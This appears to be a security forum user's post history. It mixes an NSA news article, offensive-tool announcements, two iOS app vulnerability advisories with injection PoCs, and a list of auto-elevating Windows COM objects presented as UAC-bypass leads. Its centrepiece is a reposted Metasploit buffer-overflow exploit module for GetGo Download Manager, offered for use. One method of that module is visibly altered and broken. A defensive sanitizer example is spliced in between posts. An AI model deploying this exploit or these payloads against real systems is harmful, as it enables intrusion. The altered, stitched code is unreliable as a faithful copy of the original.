Everything posted by Aerosol
-
A new wave of documents from Edward Snowden's cache of National Security Agency data published by Der Spiegel demonstrates how the agency has used its network exploitation capabilities both to defend military networks from attack and to co-opt other organizations' hacks for intelligence collection and other purposes. In one case, the NSA secretly tapped into South Korean network espionage on North Korean networks to gather intelligence. The documents were published as part of an analysis by Jacob Appelbaum and others working for Der Spiegel of how the NSA has developed an offensive cyberwarfare capability over the past decade.

According to a report by the New York Times, the access the NSA gained into North Korea's networks—which initially leveraged South Korean "implants" on North Korean systems, but eventually consisted of the NSA's own malware—played a role in attributing the attack on Sony Pictures to North Korean state-sponsored actors.

Included with the documents released by Der Spiegel are details on how the NSA built up its Remote Operations Center to carry out "Tailored Access Operations" on a variety of targets, while also building the capability to do permanent damage to adversaries' information systems, including internal NSA newsletter interviews and training materials. Also included was a malware sample for a keylogger, apparently developed by the NSA and possibly other members of the "Five Eyes" intelligence community, which was also included in the dump. The code appears to be from the Five Eyes joint program "Warriorpride," a set of tools shared by the NSA, the United Kingdom's GCHQ, the Australian Signals Directorate, Canada's Communications Security Establishment, and New Zealand's Government Communications Security Bureau. It's not clear from the report whether the keylogger sample came from the cache of documents provided by former NSA contractor Edward Snowden or from another source.

As of now, Appelbaum and Der Spiegel have not yet responded to a request by Ars for clarification. However, Appelbaum has previously published content from the NSA, including the NSA's ANT catalog of espionage tools, that were apparently not from the Snowden cache.

Pwning the pwners

The core of the NSA's ability to detect, deceive, block, and even repurpose others' cyber-attacks, according to the documents, are Turbine and Turmoil, components of the Turbulence family of Internet surveillance and exploitation systems. These systems are also connected to Tutelage, an NSA system used to monitor traffic to and from US military networks, to defend against attacks on Department of Defense systems. When an attack on a DoD network is detected through passive surveillance (either through live alerts from the Turmoil surveillance filters or processing by the Xkeyscore database), the NSA can identify the components involved in the attack and take action to block it, redirect it to a false target to analyze the malware used in the attack, or do other things to disrupt or deceive the attacker. This all happens outside of DOD's networks, on the public Internet, using "Quantum" attacks injected into network traffic at a routing point.

But the NSA can also use others' cyberattacks for its own purposes, including hijacking botnets operated by other actors to spread the NSA's own "implant" malware. Collection of intelligence of a target using another actor's hack of that target is referred to within the signals intelligence community as "fourth party collection." By discovering an active exploit by another intelligence organization or other attacker on a target of interest, the NSA can opportunistically ramp up collection on that party as well, or even use it to distribute its own malware to do surveillance.

In a case study covered in one NSA presentation, the NSA's Tailored Access Office hijacked a botnet known by the codename "Boxingrumble" that had primarily targeted the computers of Chinese and Vietnamese dissidents and was being used to target the DOD's unclassified NIPRNET network. The NSA was able to deflect the attack and fool the botnet into treating one of TAO's servers as a trusted command and control (C&C or C2) server. TAO then used that position of trust, gained by executing a DNS spoofing attack injected into the botnet's traffic, to gather intelligence from the bots and distribute the NSA's own implant malware to the targets.

Using QuantumDNS, a DNS injection attack against botnet traffic, the NSA was able to make infected PCs believe its server was part of the command and control network.

The NSA then used its position within the botnet to drop the NSA's own "insert" onto affected computers in the botnet.

Spying on spies spying on spies spying...

Things get even more interesting in the case of the NSA's urgent need to gather more intelligence from North Korea's networks. In a question-and-answer posting to the NSA's intranet, an NSA employee recounted a "fifth party" collection that occurred when the NSA hacked into South Korea's exploit of North Korean computers—and ended up collecting data from North Korea's hack of someone else: That meant that at one point, the NSA was collecting information via a South Korean implant that had in turn been collected by a North Korean implant. It's not clear whether the NSA's TAO used the existing South Korean malware as an avenue to drop its own, as happened with the "Boxingrumble" botnet.

The poster also noted another occasion when, during an attempt to hack into another target they were trying to exploit, the NSA discovered, "there was another actor that was also going against them and having great success because of a zero day they wrote." The NSA captured the zero day exploit in its passive collection and "were able to repurpose it," the NSA employee recounted. "Big win."

Source
-
http://i.imgur.com/3AfIVlH.png Seriously man, why did you post a picture of your FB? And you come here to brag that you are flooding?
-
Hi and welcome back!
-
ShellNoob is a shellcode writing toolkit that helps you write shellcode, convert it between different formats, and take care of some boring steps.

Features:
- convert shellcode between different formats (currently supported: asm, bin, hex, obj, exe, C, python, ruby, pretty)
- interactive opcode-to-binary conversion (and vice versa) mode. This is useful when you cannot use specific bytes in the shellcode.
- resolve syscall numbers and constants (not exactly implemented yet)
- portable and easily deployable (it only relies on gcc/as/objdump and python). And it's just one python file!
- in-place development: you run ShellNoob directly on the target architecture!
- other options: prepend breakpoint, 32bit/64bit switch.
- read from stdin / write to stdout support (use "-" as filename)

Download: https://github.com/reyammer/shellnoob
-
-
vFeed framework is an open source naming scheme concept that provides extra structured detailed third-party references and technical characteristics for a CVE entry through an extensible XML schema. It also improves the reliability of CVEs by providing a flexible and comprehensive vocabulary for describing the relationship with other security references and standards. Download: https://github.com/toolswatch/vFeed
-
The Social-Engineer Toolkit is an open-source penetration testing framework designed for Social-Engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of the time. SET is a product of TrustedSec, LLC - An Information Security consulting firm located in Cleveland, Ohio. Download: https://github.com/trustedsec/social-engineer-toolkit
-
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and during Penetration Tests. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage. Download: https://github.com/samratashok/nishang
-
-
Resolver is a Windows-based tool designed to perform a reverse DNS lookup for a given IP address or for a range of IPs in order to find their PTR records. Updated to version 1.0.3: added DNS record brute force. Download: Resolver | SourceForge.net
-
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GetGo Download Manager HTTP Response Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability in
        GetGo Download Manager version 4.9.0.1982 and earlier, caused by an
        overly long HTTP response header. By persuading the victim to download
        a file from a malicious server, a remote attacker could execute
        arbitrary code on the system or cause the application to crash. This
        module has been tested successfully on Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Julien Ahrens', # Vulnerability discovery
          'Gabor Seljan'   # Metasploit module
        ],
      'References'     =>
        [
          [ 'EDB', '32132' ],
          [ 'OSVDB', '103910' ],
          [ 'CVE', '2014-2206' ],
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process',
          'URIPATH'      => "/shakeitoff.mp3"
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d",
          'Space'    => 2000
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3',
            {
              'Offset' => 4107,
              'Ret'    => 0x00280b0b # CALL DWORD PTR SS:[EBP+30]
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 09 2014',
      'DefaultTarget'  => 0))
  end

  #
  # Handle the HTTP request and return a response.
  # Code borrowed from: msf/core/exploit/http/server.rb
  #
  def start_http(opts={})
    # Ensure all dependencies are present before initializing HTTP
    use_zlib

    comm = datastore['ListenerComm']
    if (comm.to_s == "local")
      comm = ::Rex::Socket::Comm::Local
    else
      comm = nil
    end

    # Default the server host / port
    opts = {
      'ServerHost' => datastore['SRVHOST'],
      'ServerPort' => datastore['HTTPPORT'],
      'Comm'       => comm
    }.update(opts)

    # Start a new HTTP server
    begin
      @http_service = nil # the Rex service start call is truncated in the post as published
    rescue
    end
  end

  def on_request_uri(cli, request)
    print_status("Client connected...")

    # Only answer the vulnerable client; everything else gets a 404
    unless request['User-Agent'] =~ /GetGo Download Manager 4.0/
      print_error("Sending 404 for unknown user-agent")
      send_not_found(cli)
      return
    end

    # Padding up to the saved return address, short jump over it, then the payload
    sploit = rand_text_alpha(target['Offset'])
    sploit << "\x90\x90\xEB\x06"
    sploit << [target.ret].pack('V')
    sploit << payload.encoded

    print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")

    # The overflow is triggered by the response header, so the body stays empty
    resp = create_response(200, sploit)
    resp.body = ""
    cli.send_response(resp)

    close_client(cli)
  end
end
```

Source
-
Document Title:
===============
File Pro Mini v5.2 iOS - Multiple Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1403

Release Date:
=============
2015-01-15

Vulnerability Laboratory ID (VL-ID):
====================================
1403

Common Vulnerability Scoring System:
====================================
6.9

Product & Service Introduction:
===============================
Multipurpose, Easy-to-Use and Robust app for files & documents. Import files, documents & media from PC/Mac, email attachments, dropbox, sugarsync, iCloud & Box.net to File Pro along with amazing transfer features of FTP and Wifi. The only documents manager app which includes total security of files along with PDF scanner, Audio Recorder and editing TXT files. Open all kind of file & documents including RAR and CBR files.

(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/file-pro-mini-ultimate-file/id540971042 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Perception System - File Pro Mini v5.2 iOS mobile web-application.

Vulnerability Disclosure Timeline:
==================================
2015-01-15: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Perception System
Product: File Pro Mini - iOS Mobile Web Application (Evereader Wifi-Sharing) 5.3

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Perception System - File Pro Mini v5.2 iOS mobile web-application. The local file include web vulnerability allows remote attackers to include unauthorized local file/path requests or system specific path commands to compromise the mobile web-application.

The vulnerability is located in the filename value of the `Evereader Wi-Fi Sharing - Index` module. Local attackers are able to manipulate the wifi web interface by usage of the vulnerable upload function. The service does not encode or parse the context of uploaded files. Local attackers are able to manipulate the input of the files to exploit the issue by a POST method request to the wifi web-application interface. The execution of the unauthorized local file or path request occurs in the index file dir listing module of the `Evereader Wi-Fi Sharing` application. The request method to inject is POST and the attack vector is located on the application-side of the online-service.

The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. Exploitation of the file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.

Vulnerable Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Evereader Wi-Fi Sharing - Index

1.2
A local command/path injection web vulnerability has been discovered in the official Perception System - File Pro Mini v5.2 iOS mobile web-application. The vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.

The vulnerability is located in the vulnerable `albumname` value of the `Evereader Wi-Fi Sharing - Index` module. Local attackers are able to inject own malicious system specific commands or path value requests to the vulnerable `albumname` value. The execution of the local command inject occurs in the `Evereader Wi-Fi Sharing - Index` module of the file dir index. The attacker is able to manipulate the albumnames in the index module of the application by preparing to change the names via iOS app sync. The encoding and validation of the interface is broken by design because files, folders and other values can be manipulated by sync to compromise the iOS mobile application. The attack vector is on the application-side and the injection requires physical device access and a local low privileged user account. Local attackers are also able to exploit the albumname validation issue in combination with persistent injected script codes to execute different local malicious attack requests.

The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.9. Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to compromise the mobile iOS application or the connected device components.

Request Method(s):
[+] [GET] (Execution)

Vulnerable Module(s):
[+] Albums

Vulnerable Parameter(s):
[+] albumname

Affected Module(s):
[+] Evereader Wi-Fi Sharing - Index

Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers without privileged user account and user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: Evereader Wi-Fi Sharing - Index (filename via POST)

<a href="/files/%3Cx.png%20 ./[LOCAL FILE INCLUDE VULNERABILITY!]" class="file"><x.png%20 ./[LOCAL FILE INCLUDE VULNERABILITY!]">x.png%20 ./[LOCAL FILE INCLUDE VULNERABILITY!]</a></td>
<td class='del'><form action='/files/%3Cx.png%20 ./[LOCAL FILE INCLUDE VULNERABILITY!]' method='post'>
<input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a>

--- PoC Session Logs [POST] (Injection & Execution) ---
Status: 302[Found]
POST http://localhost:8080/files
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Größe des Inhalts[67]
Mime Type[text/html]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8080/]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------167073016026822
      Content-Disposition: form-data; name="newfile"; filename="x.png%20 ./[LOCAL FILE INCLUDE VULNERABILITY!]"
      Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/./[LOCAL FILE INCLUDE VULNERABILITY!]
Load Flags[LOAD_DOCUMENT_URI ]
Größe des Inhalts[0]
Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8080/]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[0]
      Date[So., 11 Jan. 2015 17:47:19 GMT]

Reference(s):
http://localhost:8080/files

1.2
The local command inject web vulnerability can be exploited by local attackers with a low privileged device user account with physical device access and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: Evereader Wi-Fi Sharing - Index (albumname via sync)

<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr>
</thead>
<tbody id="filelist">
<tr><td><a href="/files/%22%3E%3C[LOCAL COMMAND INJECT VULNERABILITY!]%3E" class="file">">[LOCAL COMMAND INJECT VULNERABILITY!]></a></td>
<td class='del'><form action='/files/%22%3E%3C[LOCAL COMMAND INJECT VULNERABILITY!]%3E' method='post'>
<input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr>
<tr class="shadow"><td><a href="/files/Backup" class="file">Backup</a></td><td class="del"><form action="/files/Backup" method="post">
<input name="_method" value="delete" type="hidden"><input name="commit" value="Delete" class="button" type="submit"></form></td></tr>
<tr><td><a href="/files/Recents" class="file">Recents</a></td><td class="del"><form action="/files/Recents" method="post">
<input name="_method" value="delete" type="hidden"><input name="commit" value="Delete" class="button" type="submit"></form></td></tr></tbody>
</table>

--- PoC Session Logs [GET] (Execution) ---
Status: 200[OK]
GET http://localhost:8080/files?Sun%20Jan%2011%202015%2018:49:41%20GMT+0100
Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS ]
Größe des Inhalts[114]
Mime Type[text/plain]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
      Accept[application/json, text/javascript, */*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://localhost:8080/]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[114]
      Cache-Control[private, max-age=0, must-revalidate]
      Content-Type[text/plain; charset=utf-8]
      Date[So., 11 Jan. 2015 17:44:43 GMT]

Reference(s):
http://localhost:8080/

Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload module POST method request. Filter the filenames and restrict the input in the app and in remote requests to prevent local file include attacks.

1.2
To fix the second vulnerability encode and parse the albumname value on sync (PUT) request. Filter the albumname values and restrict the input to disallow special chars and script code tags.

Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the filename value of the upload module is estimated as high. (CVSS 6.6)

1.2
The security risk of the local command injection vulnerability in the albumname value of the index module is estimated as medium. (CVSS 5.9)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Source
-
Document Title:
===============
VeryPhoto v3.0 iOS - Command Injection Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1401

Release Date:
=============
2015-01-13

Vulnerability Laboratory ID (VL-ID):
====================================
1401

Common Vulnerability Scoring System:
====================================
5.6

Product & Service Introduction:
===============================
VeryPhoto Pro is your side of the most powerful local album management software that allows you to easily manage your massive photos, while giving you an unprecedented user experience. No in-app purchase, no functional limitations. album password - effectively protect your privacy. multi-touch browsing - Personalized operation allows you to have a different user experience. professional photo editing features - lets you easily have a professional-grade graphics processing technology.

(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/veryphoto-pro-album-password/id720810114 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local command inject web vulnerability in the official VeryPhoto v3.0 iOS mobile web-application.

Vulnerability Disclosure Timeline:
==================================
2015-01-13: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Cheng Chen
Product: VeryPhoto - iOS Web Application (WiFi) 3.0

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
A local command inject web vulnerability has been discovered in the official VeryPhoto v3.0 iOS mobile web-application. The vulnerability allows remote attackers to inject own commands by usage of stored manipulated system/device values to compromise the apple mobile iOS application.

The command inject vulnerability is located in the vulnerable `albumname` value of the `HTTP Wifi Server`. Local attackers are able to inject own malicious system specific commands or path value requests by usage of the vulnerable `albumname` value. The execution of the command occurs in the `VeryPhoto - File Dir Index Listing` of the http wifi interface application. Attackers are able to manipulate the local albumname values by renaming albums in the iOS default photo app to execute the commands. The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account. Local attackers are also able to exploit the albumname validation issue in combination with persistent injected script codes.

The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to compromise the mobile iOS application and the connected device components.

Request Method(s):
[+] [Sync]

Vulnerable Module(s):
[+] Album

Vulnerable Parameter(s):
[+] albumname

Affected Module(s):
[+] VeryPhoto - File Dir Index Listing (http://localhost:8080/)

Proof of Concept (PoC):
=======================
The local command inject web vulnerability can be exploited by local attackers (network) without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install the VeryPhoto Pro Album v3.0 iOS application (https://itunes.apple.com/de/app/veryphoto-pro-album-password/id720810114)
2. Open in the device menu the default photo album app of apple (iphone/ipad)
3. Add a new album and change the name to the local command that should be injected
4. Save the settings and open the VeryPhoto Pro Album application
5. Start the Wifi service
6. Surf with a local network device to the local web-server (localhost:8080)
Note: The execution of the command inject occurs after the wifi interface index has been visited. The vulnerable value that executes the command is the albumname.
7. Successful reproduce of the local command inject web vulnerability!

PoC: Albumname - File Dir Index

</script><tr><td height="170" width="150"><p align="center">
<img src="getCoverImage?%7B%22name%22:%22%5C%22%3E%3C[LOCAL COMMAND INJECTION VULNERABILITY!]img%20src=%5C%22x%5C%22%3E%2520%3Ciframe%20src=a%3E%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22 assets-library://group/?id=7BADE58E-C286-43D8-8CE2-4415C4DF35CA&filter=1537%22,%22numberOfImage%22:%220%22%7D" onclick="albumClick('0')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"><p align="center">
<img src="getCoverImage?%7B%22name%22:%22Camera%20Roll%22,%22type%22:%222%22,%22groupType%22:16,%22url%22:%22assets-library://group/?id=70169F06-36C7-430C-AA4F-55B95E268426%22, %22numberOfImage%22:%223%22%7D" onclick="albumClick('1')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150">
<p align="center"><img src="getCoverImage?%7B%22name%22:%22My%20Photo%20Stream%22,%22type%22:%222%22,%22groupType%22:32,%22url%22:%22 assets-library://group/?id=F8476D51-E4C9-4A2A-948B-2D577719B9C7&filter=1537%22,%22numberOfImage%22:%220%22%7D" onclick="albumClick('2')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"></td></tr><tr><td height="20">
<p align="center"><font size="2" face="Courier New">"><img src="x">%20<iframe src="a">>(0)</font></td><td height="20" width="50"></td>
<td height="20" > <p align="center"><font face="Courier New" size="2">Camera Roll(3)</font></td><td height="20" width="50"></td><td height="20" >
<p align="center"><font face="Courier New" size="2">My Photo Stream(0)</font></td><td height="20" width="50"></td><td height="20" >
<p align="center"></td></tr><tr><td height="20" colspan="7"></td></tr>
</table>
</div>

--- PoC Session Logs [GET] (Execution) ---
Status: 200[OK]
GET http://192.168.2.104:8080/getCoverImage?%7B%22name%22:%22%5C%22%3E%3Cimg%20src=%5C%22x%5C%22%3E%2520%3Ciframe%20src=a%3E%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22assets-library://group/?id=7BADE58E-C286-43D8-8CE2-4415C4DF35CA&filter=1537%22,%22numberOfImage%22:%220%22%7D
Load Flags[VALIDATE_ALWAYS ]
Größe des Inhalts[3813]
Mime Type[image/x-jpg]
   Request Header:
      Host[192.168.2.104:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://192.168.2.104:8080/]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Accept-Charset[utf-8]
      Content-Length[3813]
      Content-Type[image/x-jpg]
      Connection[close]
-
Response Status: OK[200]
GET http://192.168.2.104:8080/x[LOCAL COMMAND INJECTION VULNERABILITY!]
Load Flags[VALIDATE_ALWAYS ]
Größe des Inhalts[unknown]
Mime Type[unknown]
   Request Header:
      Host[192.168.2.104:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://192.168.2.104:8080/]

Reference(s):
http://localhost:8080/x
http://localhost:8080/getCoverImage

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable `albumname` value. Restrict the albumname value and disallow special chars to prevent application-side injection attacks. Encode the vulnerable output value in the file dir index listing to prevent the execution of local commands.

Security Risk:
==============
The security risk of the local command inject web vulnerability in the albumname is estimated as medium. (CVSS 5.6)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Source
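Both advisories above (File Pro Mini's `filename` upload value and the `albumname` value that File Pro Mini and VeryPhoto render into their Wi-Fi directory listings) end with the same two-part fix: validate the name before it reaches the filesystem, and encode it before it is written into the listing HTML. The following is an added example, not code from either app or from Vulnerability Lab; the function names, the character allowlist and the 400/302 status choices are this example's own assumptions about how such a Wi-Fi sharing handler might be written.

```python
import html
import re
from typing import List, Optional, Tuple
from urllib.parse import quote

# Allowlist for a stored name: letters, digits, dot, underscore, space, dash.
# Anything else (quotes, angle brackets, percent signs, brackets, slashes)
# is rejected rather than "repaired", so an attempt stays visible in logs.
# The set and the 128-character cap are assumptions for this example.
SAFE_NAME = re.compile(r"[A-Za-z0-9._ -]{1,128}")


def sanitize_filename(raw: str) -> Optional[str]:
    """Return the name if it is safe to store, otherwise None."""
    if "\x00" in raw or "/" in raw or "\\" in raw:
        return None  # path separators or NUL: never let these reach a path join
    name = raw.strip()
    if name in ("", ".", "..") or not SAFE_NAME.fullmatch(name):
        return None  # empty, dot-directories, or characters outside the allowlist
    return name


def handle_upload(raw_name: str) -> Tuple[int, Optional[str]]:
    """Decision of a hypothetical upload handler for the multipart `filename`
    field: 400 for a rejected name, 302 (redirect back to the index, as the
    advisory's session log shows for an accepted upload) otherwise."""
    name = sanitize_filename(raw_name)
    if name is None:
        return 400, None
    return 302, name


def render_listing(names: List[str]) -> str:
    """Build the index rows with every name encoded for its context.

    `quote(..., safe="")` percent-encodes the name inside the href so it
    cannot break out of the attribute; `html.escape(..., quote=True)`
    neutralises < > & " ' in the visible text, so an album named
    '"><img src=x>' is shown literally instead of being parsed as markup.
    """
    rows = []
    for n in names:
        href = "/files/" + quote(n, safe="")
        text = html.escape(n, quote=True)
        rows.append(f'<tr><td><a href="{href}" class="file">{text}</a></td></tr>')
    return "\n".join(rows)


if __name__ == "__main__":
    # Constructed inputs modelled on the advisories' PoC values.
    for candidate in ["report 2015.pdf", "x.png%20 ./passwd", '"><img src=x>', ".."]:
        print(repr(candidate), "->", handle_upload(candidate))
    # Album names still get rendered safely even when they were never filtered
    # (for example when they arrive through device sync rather than upload).
    print(render_listing(["Camera Roll", '"><img src=x>']))
```

The two layers are deliberately independent: the sync path in the advisories bypasses the upload handler entirely, so output encoding in `render_listing` has to hold on its own, and input validation in `sanitize_filename` stops traversal names such as `x.png%20 ./...` from ever being joined onto a filesystem path.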
-
List of COM objects with elevation enabled. This does not mean they are all useful for bypassing UAC or anything like that. Most of them are not. Some of them like Copy/Move/Rename/Delete/Link Object and Shell Security Editor are already used by malware. All others need to be investigated; use OleView from the Windows SDK for more info. Snapshots taken from clean installs.

Windows 7 SP1 x64, 7601

WPD Association LUA Virtual Factory {00393519-3A67-4507-A2B8-85146167ACA7}
Virtual Factory for Biometrics {0142e4d1-fb7a-11dc-ba4a-000ffe7ab428}
CEIPLuaElevationHelper {01D0A625-782D-4777-8D4E-547E6457FAD5}
{08d450b7-f7e5-4424-8229-11888adb7c14}
RasDlg LUA {0C3B05FB-3498-40C3-9C03-4B22D735550C}
Wireless Setup Class {0c98b8bc-273c-464d-938a-b9709607e137}
HNetCfg.FwOpenPort {0CA545C6-37AD-4A6C-BF92-9F7610067EF5}
ARP CBS Uninstaller Proxy {0da7bfdf-c0a0-44eb-be82-b7a82c4721de}
WUAppElevator class {1138506a-b949-46a7-b6c0-ee26499fdeaf}
VistaWUWebControl Class {12a66224-5e8a-4679-8941-0b9b960bf5ea}
Virtual Factory for DiagCpl {12C21EA7-2EB8-4B55-9249-AC243DA8C666}
SPPLUAObject Class {179CC917-3A82-40E7-9F8C-2FC8A3D2212B}
Share Media Settings Writer {19BA17F2-2602-4E77-9027-103894607626}
Create New Link {1BA783C1-2A30-4ad3-B928-A9A46C604C28}
Lpksetup LUA Elevation {1C749B87-568C-4865-8E73-6413F8372CE6}
Shell Indexer Admin Object {1E1714A3-50B9-480b-A94A-636D9A9B56D1}
Parental Controls Override {1E5300BE-0762-4527-8140-C0FF22DDFC56}
Security Shell Extension {1f2e5c40-9550-11ce-99d2-00aa006e086c}
Microsoft Disk Quota UI Elevation Helper {1fb2a002-4c6c-4de7-85c2-cb8db9a4f728}
Detection And Sharing {1fda955b-61ff-11da-978c-0008744faab7}
Sensors Sensor Configuration Helper {2331D136-E39D-4019-92D6-7CE5579962FB}
WUPublishedAppInstallorElevator Class {26D32566-760A-40A2-AA82-A40366528916}
FaultrepElevatedDataCollection {2C256447-3F0D-4CBB-9D12-575BB20CDA0A}
HNetCfg.FwRule {2C5BC43E-3369-4C33-AB0C-BE9469677AF4}
Advanced Indexing Options Dialog Object {2F2165FF-2C2D-4612-87B2-CC8E5002EF4C}
HNetCfg.FwMgr {304CE942-6E39-40D8-943A-B913C40C9CD4}
CtTuner Class {32BA16FD-77D9-4AFB-9C9F-703E92AD4BFF}
Mcx2Install Class {3630AB4B-C0D2-4C1B-B7E7-73A2CF9A4521}
Device Pairing Handler Class {383b69fa-5486-49da-91f5-d63c24c8e9d0}
Copy/Move/Rename/Delete/Link Object {3ad05575-8857-4850-9277-11b85bdb8e09}
CMLUAUTIL {3E000D72-A845-4CD9-BD83-80C07C3B881F}
CMSTPLUA {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
AccesibilityCplAdmin Class {434A6274-C539-4E99-88FC-44206D942775}
Manage Network Names {44C39C96-0167-478F-B68D-783294A2545D}
Home Networking Configuration Manager {46C166AA-3108-11D4-9348-00C04F8EEB71}
CIEContentAdvisorBroker {46CB32FA-B5CA-8A3A-62CA-A7023C0496C5}
RasGcw LUA {4A6B8BAD-9872-4525-A812-71A52367DC17}
ERCLuaElevationHelper {4BC67F23-D805-4384-BCA3-6F1EDFF50E2C}
Shell Security Editor {4D111E08-CBF7-4f12-A926-2C7920AF52FC}
AddMdmObj Class {4DF929E7-4C5E-4587-A598-7ED7B3D6E462}
LayerUIPropPage {513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8}
Region and Language UAC Elevation {514B5E31-5596-422F-BE58-D804464683B5}
FaxCommon Class {59347292-B72D-41F2-98C5-E9ACA1B247A2}
Virtual Factory for Display {5D05A4EB-54EA-4B7F-A28D-CE51F6BCBAF2}
Mount Point Rename {60173D16-A550-47f0-A14B-C6F9E4DA0831}
NAP Elevated class {677126ed-2a91-40ff-8c52-06181c064573}
Sensors CPL Change Device Permission LUA Helper {6CE51F75-0448-438e-B9CA-69C352A248A7}
Advanced Indexing Options Dialog Object {6D3951EB-0B07-4fb8-B703-7C5CEE0DB578}
